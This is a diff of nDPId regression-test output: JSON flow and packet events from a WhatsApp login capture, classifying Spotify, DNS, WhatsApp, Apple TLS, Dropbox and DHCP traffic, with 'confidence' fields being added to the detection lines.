-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582377898,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582377898,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379543,"flow_last_seen":1432582379543,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582379543,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432582379543,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1432582379543,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA+Df0AAEAR51zAqAIEwKgCAfEBADUAKg3CrIsBAAABAAAAAAAAA2UxMgh3aGF0c2FwcANuZXQAAAEAAQ=="}
-00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379543,"flow_last_seen":1432582379543,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582379543,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379543,"flow_last_seen":1432582379543,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432582379543,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432582379571,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"ts_msec":1432582379571,"pkt":"APS5Jrv0xiwDYGpkCABFAAC+Me8AAEARwurAqAIBwKgCBAA18QEAqrdkrIuBgAABAAgAAAAAA2UxMgh3aGF0c2FwcANuZXQAAAEAAcAMAAEAAQAAAiQABLitsy\/ADAABAAEAAAIkAASeVTpnwAwAAQABAAACJAAEuK2zLMAMAAEAAQAAAiQABLitsyPADAABAAEAAAIkAARsqLDGwAwAAQABAAACJAAEnlU6NMAMAAEAAQAAAiQABJ5VOg\/ADAABAAEAAAIkAASeVTol"}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1432582379571,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.173.179.47"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1432582379543,"flow_last_seen":1432582379571,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1432582379571,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":61697,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"e12.whatsapp.net","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.173.179.47"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582379591,"flow_last_seen":1432582379591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432582379591,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432582379591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1432582379591,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAjylAAEAGEH7AqAIEnlU6D8A2FGYksXJ9AAAAALAC\/\/+BgwAAAgQFtAEDAwQBAQgKLfyAogAAAAAEAgAA"}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432582379745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1432582379745,"pkt":"APS5Jrv0xiwDYGpkCABFAAA8XOEAADUGjcqeVToPwKgCBBRmwDYfJVHSJLFyfqAS\/\/8RNgAAAgQFrAEDAwkEAggKXZ2yry38gKI="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432582379848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1432582379848,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0bGhAAEAGM0vAqAIEnlU6D8A2FGYksXJ+HyVR04AQIFgeowAAAQEICi38gaNdnbKv"}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582379591,"flow_last_seen":1432582380392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1432582380392,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"158.85.58.15","src_port":49206,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582381179,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"ts_msec":1432582381179,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXIltFAAEAGh5\/AqAIEEa1CZsA1Abt+clmMpMYxPVAQQABXnAAAFwMDB3i+HiPgShCayKsiCSxppt+UVMG6sNLf32XwXp\/5y1\/Gi93F3S41DWF8\/kCqCE3bWkUsOQ\/D44TQ+2n51pbyMSPLw0aW5BBc1KN+NXFB6c0\/EvLUkiCkXMNnoBikvRGoWqnT3MsBLR3ifxEfJkx0KA0FgI9JutlWbXDDUTzCRBEZTuRft2ygLhc453pAbiPG9v0WPMDLHXiyCBIVg\/B5dK4qKFD6E2UMKFMhu4mZRR2j\/6qxWlXTvDrMGoz+8Qo7VA74VXDOmIIqRacL+CmsjHCFgzIlevE9HbzQStt3waOocRqfRvIAnyjErcnsgCXougYuTv7e+MXADNmAZBilIIoi3Uil6da7kvrxaXQ4p+uZdx7Gy5yoHJv8xUlpNlf\/6TnuDJ0Sr34mxp2ViDhiTjdQbwAa3oxSYIriERZCD+iy2XBPrLEva6gxIYSFoMA1nMvNEDvwHAwVpPX12H1IQq6zqjIg+g2T3TBZpcZ71NLHtrlkBg9o5NZd7LL0MCoUc5LF5gFQhEphIEtekSiwBF\/vWaUkYpAxP7LvgNiCoLKAfwM9RyhmY\/groOK8zq86A8Z\/A5kmVimU2YKg3RBFJIj4fY5ZjJv5w7NZlJ5I4tkbJJp4AoKwuThn7szdjjoI\/Gz6k3Cz8YZmXMOwDviwyDpLeaUvIrJPOa1ciNsy0vHmM7ukkMbC8Ej95C27cDvULH7dL6T0XGOtlAh\/1i8BfnuG9hN4cxa\/b+5gAAhOFw1eAAyMGcUy23P+89rorZ3KMrek+vuNcICgkwnazh1Z5AFtIzlWlMfxbaxy\/+pJoR3DnO0EuyOOHz4IdCogPPXsieGyIHTaGzpebRd3ow8OikTIF2RiPLnkFeI25KqwWpGL6weTaFVmxqKuafYQNbLXqeb1mf\/DlBl7xTHdJ\/K7sh+ashtIQDjtOnXuANeb1sDwla5nv+DnrsBoezknxm9kI8r\/CTGWQN\/tTHUBQ3JnQu2sU3BgKQv67idjs6\/xEGKN0fSceO\/OmdSiRN4eY5AKeqGiRb0iQcOp0eoO0nHkil+B5uKPiznWHrrsTIB9dEBiXQpdbXNu0tyB5osy9qzKMkf\/o9uJ+QSQ5cIo7DjRzFZnpJOkCxvvXWU+FpzDhZxIpMTrOA0QqAGTa21N2fhnR7KTBe68GBzD362LyujtxvtI68Y+e4qwU8QRYv94bSptDA1mC5d7hLaair0kLj5FJuw9fQYw56jdCBuIztl42Q9ip+eJzWCXzcqrMuxyZhMkusneUAU213bxe7LIroTzopLTvDr1KXzVypQq1ZP5NCiggcKfqeKZidfD+aXqLGRh7olUlGpaHuqy1maaxpidAIrK\/rniCznE3Y8bsAPAq11XlkH+mjEIj4B5Et\/0lF+xCPP+z5E9ZGqKuPoSIYCKQzbemYTMMkhnWOl6BB5kOc48mQHXcM\/HEeMKQ4qb33pU8bbK3Mr9Vb0pzxFXpDLLr1AV4WOOsDEdqZRvrHbAGGit7Ox3YtWydJ61deheU2gY0jifGxvWb6TKpitF7KENLzDKe6R1+jkekRnLVGAoiZ6cidxCTodgPGJaODRed4KQauNt6lzH+E+PJp48Tc7z95H2uvpzfMxaqZdwBSkB4v4ScjVowzkErkvUxVQNOveEwAJQDuk\/MJnrSUEivzWnCcp3a+GPlrKE2YjKybAPuXK8NmegG3utqM2DgTsUTgCNR+3ESE1g9tqjPpb6WMGMIfSBz2fb5tlr8mBN4CEu0H72FkFaOVAQvrDFdSC9uWsLI+9xr\/qifTPscJiK47gZwd7xJ1+AvgSKzzkjQwgSwyGtffBvX0O0GlFuSMAxYjLubFvVAvKhF6gkJ9oPlwZ9pkLOs5hTGXcjvBfkdt78lFxJQl3eijMQRas5LDn3A9Tn53tCW5oXAuOYXz4b"}
 01099{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":531,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":531,"pkt_l4_len":497,"ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIFAqxAAEAGH4jAqAIEEa1CZsA1Abt+cl8spMYxPVAYQAAK4wAA+zXxkGmxqmlJcwlR7TpHpRtDDy9iaRt9w+hOFsERXuy8gwV22TTGXYqWLP3aSg0FRpPNh6b2JxTA9OSkJEk04NCfWqJRauLthWRuA7XoVn8i6Smk+coAOa3u15Yq91KVTfK0Likn42RkhoMCTU67u6i6Y4GW7d7uWiM6L3uLokbbGTmGs29u3afEGnNWZwLcuyp6rGxmPmWxvxgkiNCzEIsj5+jDbrTqLXDyyF322ZG7ztnAr92I1EUwbaElkdT9P28rYnazLdDX3NtrMNZoVpJg+JtJ\/7kZqQ2Wqzmg\/a3xXi4EVY3r6CTewAoUnubR3Qb8d8SxZWO8dXB980UXO8ObJWaEL5I20Sp30w7kYXi8hv4VgTLwR\/5GH+diyQKZuXNNplXdUL9qR0BnzfYHcTgjG28TOg74dTk611xDBeVR4Itg6rhO4EXCbpfiRmK6bb3CXGkaTCMHxUnezI+xc2Wog+XxCXrGyOiN2uGEyOBaMLxsAdU\/WfMK5Hg2kk6QV97kZZAhmz0GEeQIuwbiHtXsFgOmiLHGkBFU3uvrL2U0AIsy\/dg28ProYM\/UVKotXUmjaEkwo4XPHqyzoqhSMSd8fGbpRTWD+Jj7SG1OLSQLZ6OzyLhulPpesWWw"}
 01215{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432582381179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":610,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":610,"pkt_l4_len":576,"ts_msec":1432582381179,"pkt":"xiwDYGpkAPS5Jrv0CABFAAJULUhAAEAG9JzAqAIEEa1CZsA1Abt+cmEJpMYxPVAYQAAkaQAAFwMDAifRP6n1iN3uB\/Uhy6B3MN22nTeVXJRqDhAyLGWagzjVPV67eGMiWlDpxIYk9ZRXb8ENyJMklAVg5qQxAfredM796d1woE5CM\/dDlnC9hhfBLqlOMT0Sc23vnR6S0CtE+vcI2IEc50YYFIr8cCuBcLPUtehQ+6FiIBzPUNdC8gBpCK0l8ehCaB6UsJ+9Lz+rqI7LymD80O7JD9GQGlEzf0ROrOYPwKN9oloslBYMUuNcVtuTSnZlQf6clnYgiVqjkPEIWZnj1\/SzJxC0XzXDZTCazzjZUphrvHsUFVKI\/iQfQLn2Pm20z\/bY+umTrESbc\/Rb\/jTAxKkWPlTguW5QNPTgHe+8CLbu8GlNIUhp6XnzV0lotZMlMuaBJakvd6GmWA8qWeiSGeNI8Nxabsp54T+pQf+cFTWMVSzn894mO+DZZ3gtq32z87kDjYiMhE2jHBbOrnjFvxmtQtZu7lyboSLDYh55cOzJECLrbK8MSRuDtHOP5G6iepYtPwv3WMGLCV+hTD9hULIUKlQnW8NxmNPf6x7m2WXh+T5KFO1k2GNZTSM8sWZLLJiGPB3r5p1nS3ObF9UaRS1rU\/+0JK5FT6PVQl\/T6rcJ66cGodbOS0a03YtqhfdlphEfqQSNy4IBPyE7+TYhqlI5kH8vw+oFYBVtxUinzFEEO03Tz6ey1LN8P\/4vb9rv1pyNfFxaNarK\/6\/1noAhKaU7nGWU\/L6Er+GI\/BOXYTn7Ng=="}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582381179,"flow_last_seen":1432582384764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15219,"flow_avg_l4_payload_len":475,"midstream":1,"ts_msec":1432582384764,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01122{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1432582396509,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"ts_msec":1432582396509,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISQPEAAEARsZnAqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582396509,"flow_last_seen":1432582396509,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582396509,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582399902,"flow_last_seen":1432582399902,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1432582399902,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1432582399902,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1432582399902,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIRFYAAP8Rdk8AAAAA\/\/\/\/\/wBEAEMBNOdfAQEGALYzLg4AAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwkBAwYPd1\/8LC45AgXcPQcB2DBiVgAcMwQAdqcADApMdWNhcy1pTWFj\/wAAAAAAAAAAAAAAAAAA"}
-00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582399902,"flow_last_seen":1432582399902,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1432582399902,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}}
+00733{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582399902,"flow_last_seen":1432582399902,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1432582399902,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}}
